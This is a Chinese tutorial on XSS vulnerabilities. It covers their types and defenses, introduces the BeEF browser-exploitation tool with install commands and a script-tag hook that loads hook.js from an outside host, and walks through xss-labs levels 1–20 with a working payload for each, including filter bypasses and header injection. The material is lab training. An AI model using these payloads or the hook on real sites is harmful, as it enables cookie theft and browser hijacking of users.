web漏洞-xss漏洞

文章目录

  • web漏洞-xss漏洞
    • 前言
    • xss介绍
      • 什么是xss
      • xss漏洞产生原因
      • xss漏洞危害
      • xss漏洞分类
        • 反射型xss
        • 存储型xss
        • DOM型xss
      • xss漏洞防护
    • 工具介绍
      • xss平台
      • beef
        • 主页面介绍
        • 使用方法
    • 靶场演示
      • 靶场搭建
      • level1
      • Level2
      • Level3
      • Level4
      • Level5
      • Level6
      • Level7
      • Level8
      • Level9
      • Level10
      • Level11
      • Level12
      • Level13
      • Level14
      • Level15
      • Level16
      • Level 17
      • Level 18
      • Level 19
      • Level20
    • 总结

前言

​ 介绍xss漏洞的产生原因、危害、分类、防护,beef工具介绍及xss漏洞靶场演示等。

xss介绍

什么是xss

​ xss(Cross-site scripting,跨站脚本攻击),指的是攻击者在HTML页面中插入恶意的javascript脚本,这些脚本会在被攻击者浏览页面时执行,实现如cookie获取、键盘监听、密码窃取、页面跳转等功能。

xss漏洞产生原因

​ xss漏洞的产生原因主要是由于代码编写时对参数的输入输出控制不严谨导致攻击者能够通过构建攻击语句作为输入,网页输出显示时便自动执行了攻击语句。

xss漏洞危害

1、网络钓鱼,包括盗取各类用户账号;2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;3、劫持用户(浏览器)会话,从而执行任意操作,例如进行非法转账、强制发表日志、发送电子邮件等;4、强制弹出广告页面、刷流量等;5、网页挂马,进行恶意操作,例如任意篡改页面信息、删除文章等;6、进行大量的客户端攻击,如DDoS攻击;7、获取客户端信息,例如用户的浏览历史、真实IP、开放端口等;8、控制受害者机器向其他网站发起攻击;9、结合其他漏洞,如CSRF漏洞,实施进一步作恶;10、提升用户权限,包括进一步渗透网站;11、传播跨站脚本蠕虫等;

xss漏洞分类

反射型xss

​ 一般是一次性的攻击,只有在用户访问了攻击者构建的恶意链接后才会被攻击。如一个链接正常访问为https://www.baidu.com/,攻击者构建了恶意访问链接为https://www.baidu.com/?message=script%3Ealert(1)%3C/script%3E,通过message参数进行攻击,用户正常访问百度网站是不会受到影响的,只有点击了恶意访问链接构建了message参数才会被影响

存储型xss

​ 存储型xss指的是攻击者已经将恶意代码存储到了网站服务器上,用户只要访问网站就会受到攻击,如攻击者将恶意代码存储到了https://www.baidu.com/网站上,那么任何用户只要访问https://www.baidu.com/网页就会受到攻击。

DOM型xss

​ DOM型xss指的是攻击者通过修改html网页的dom结构造成的攻击,和反射型xss一样,也是只有当用户访问了恶意链接后才会被攻击,和反射型xss的区别就是反射型xss是服务器返回html页面时就已经包含了恶意脚本,而DOM型xsss在服务器返回html页面时是没有包含恶意脚本的。比如你输入一个字符串后前端代码并没有向后端发起请求,而是直接渲染在页面上造成的xss攻击为DOM型xss,而如果你输入一个字符串后前端向后端发起请求,后端返回的内容带上了恶意代码造成的xss攻击为反射型xss。

xss漏洞防护

​ 由于xss漏洞产生原因主要是由于对输入输出的控制不严谨导致的,因此,在防御时,可以对输入语句作过滤,符合xss攻击特征的输入语句则过滤,如script、onxxx等事件触发函数等。再对输出作转义,如<等字符。

工具介绍

xss平台

​ xss平台是指网上公开的集成了部分xss漏洞payload的平台。使用https://xss.pt/平台演示。

beef

​ beef是一款针对浏览器的渗透测试工具,里面集成了许多payload,我们可以利用它来配合xss漏洞进行攻击,项目地址:https://github.com/beefproject/beef。

主页面介绍

# kali 安装
sudo apt install beef-xss
# 启动
sudo beef-xss
# 停止
sudo beef-xss stop
# 登录默认账号beef,密码启动时设置

使用方法

​ 只要在目标浏览器中注入<script src="http://192.168.237.100:3000/hook.js"></script>语句即可在beef后台连接浏览器。

靶场演示

靶场搭建

​ 使用xss-labs靶场演示,项目地址:https://github.com/do0dl3/xss-labs。搭建直接使用phpstudy工具搭建即可,此处不做演示。

level1

​ 这个关卡直接在name参数中注入xss脚本即可,如图1。将xss语句修改为beff的钩子语句,如图2,此时可以使用beef-xss的模块功能,如cookie获取,页面html代码获取,浏览器重定向等操作。

Level2

​ payload:"><script>alert(1)</script>//

Level3

​ payload:' onclick='alert(1)'

Level4

​ payload: " onclick="alert(1)"#

Level5

​ payload:"><a href="javascript:alert(1)"/>

Level6

​ payload:"><a hRef="javascript:alert(1)"/>

Level7

​ payload:" oonnclick="alert(1)">

Level8

​ payload:javascript:alert(1),javascript:alert(1)的HTML编码

Level9

​ payload:javascript:alert(1)//http://,javascript:alert(1)编码加上//http://

Level10

​ payload:http://localhost:8086/level10.php?keyword=<script>alert(1)</script>&t_link=111&t_history=222&t_sort="onclick="alert(1)" type="text"

Level11

​ payload:"onclick="alert(1)" type="text",抓包修改http头referer值进行攻击。

Level12

​ payload:"onclick="alert(1)" type="text",抓包修改http头User-Agent进行攻击。

Level13

​ payload:user="onclick="alert(1)" type="text",抓包修改http头Cookie进行攻击。

Level14

​ 本来的网站指向的应该是测试exif xss漏洞的网站,现在网站好像改了,跳过。

Level15

​ payload:localhost:8086/level15.php?src='level1.php?name=<image src=1 onerror=alert(1)>'

Level16

​ payload:<image%0Asrc=1%0Aonerror=alert(1)>

Level 17

​ payload:arg01=a&arg02=b onmouseover=alert(1)

Level 18

​ payload:arg01=a&arg02=b onmouseover=alert(1)

Level 19

​ 考察的是flash xss,flash插件已经不支持了,不看了,可参考:https://blog.csdn.net/u014029795/article/details/103213877,https://blog.csdn.net/qq_38768365/article/details/114043820。

Level20

​ 和19一致,跳过。

总结

​ 挖掘xss漏洞主要是在用户输入网页输出的地方,通过观察网页源代码的方式尝试写入攻击语句,如先闭合再写入语句、使用事件函数、编码等方式。

web漏洞-xss漏洞相关推荐

  1. Web安全 XSS漏洞的利用(Beef工具)(点击链接就被黑的技术.)

    XSS漏洞的 概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的 ...

  2. html应用json 文件_安全研究 | Slack桌面应用程序的RCE漏洞+XSS漏洞

    对于Slack的桌面应用程序来说,一些应用内跳转.XSS.逻辑重定向和HTML或javascript注入bug,都有可能导致任意代码执行.这篇Writeup就讲述了作者通过构造HTML注入,绕过Sla ...

  3. web安全---XSS漏洞之标签使用2

    所有标签已经测试完并可以使用,测试环境:DVWA的反射型XSS,等级low 0x01 <script>标签 <script>alert(2)</script> &l ...

  4. web安全----XSS漏洞之基本原理

    0x01 概述 XSS为跨站脚本攻击,XSS攻击针对的是用户层面的攻击!类型有反射型XSS.存储型XSS.DOM型XSS,这里的DOM可以理解为页面,或者是所有的标签.内容之和 0x02 反射型XSS ...

  5. 蜜罐中利用jsonp跨域漏洞和xss漏洞的分析

    一.前言 我们在打红队的时候,经常会碰到蜜罐,而更有一些"主动防御"的蜜罐中利用到了一些网站的跨域漏洞和xss,对此进行简单分析. 二.蜜罐的概念 蜜罐主要是通过布置诱饵,诱使攻击 ...

  6. 【网络安全】Xss漏洞

    xss漏洞 xss漏洞介绍 危害 防御方法 xss测试语句 xss攻击语句 1. 反射性xss 2.存储型xss 3.DOM型xss dvwa靶场各等级渗透方法 xss反射型(存储型方法一致) Low ...

  7. Web渗透测试---Web TOP 10 漏洞

    文章目录 前言 一.注入漏洞 二.跨站脚本(xss)漏洞 三.文件上传漏洞 四.文件包含漏洞 五.命令执行漏洞 六.代码执行漏洞 七.XML外部实体(XXE)漏洞 八.反序列化漏洞 九. SSRF漏洞 ...

  8. ASP.Net防范XSS漏洞攻击的利器HtmlSanitizer

    项目名称:HtmlSanitizer NuGet安装指令:Install-Package HtmlSanitizer 官方网站:https://github.com/mganss/HtmlSaniti ...

  9. WEB安全:XSS漏洞与SQL注入漏洞介绍及解决方案

    对web安全方面的知识非常薄弱,这篇文章把Xss跨站攻击和sql注入的相关知识整理了下,希望大家多多提意见. 对于防止sql注入发生,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避 ...

最新文章

  1. php中htpt,PHP中的HTTP协议
  2. 深度学习助力网络科学:基于深度学习的社区发现最新综述
  3. fisher's exact test
  4. flex java 全局拦截_flex + java 过滤敏感词
  5. 数据结构值排序算法(三)-快速排序
  6. Boost:boost::bimaps::set_of的测试程序
  7. Django中级篇之模板语言
  8. 【超分辨率实验】Matlab-使用深度学习的单图像超分辨率(Single Image Super-Resolution Using Deep Learning)
  9. maven下载源码linux,Maven 下载 源码和javadoc 命令
  10. CF1131 G. Most Dangerous Shark(DP+单调栈优化)
  11. [设计模式] ------ 原型模式(浅拷贝和深拷贝)
  12. oracle 11g(四)给oracle添加为系统服务(脚本)
  13. node.js学习之npm 入门 —8.《怎样创建,发布,升级你的npm,node模块》
  14. 树形dp-智慧树下你和我
  15. Nginx作为静态资源服务器
  16. 弘辽科技:拼多多直通车测款是怎样操作的
  17. 怎样从微博下载视频?
  18. C语言实现文件分割功能
  19. WIN7用键盘控制鼠标
  20. 基于微信小程序的商城购物系统的设计与实现(论文+源码)_kaic

热门文章

  1. 做需求分析师的几点困惑
  2. 信号完整性分析系列——1基本概念
  3. 响应式分布式区别_边缘计算的七种定义,边缘计算与云计算、雾计算的区别
  4. jsp网上商店网上书店
  5. 关于typedef的用法
  6. python-体质指数BMI计算
  7. 【HTML5】调查问卷制作简约版
  8. matlab, 生成一个数值一样的n维列向量
  9. (附源码)app校园购物网站 毕业设计 041037
  10. Linux笔记 No.22---(Linux - PAM)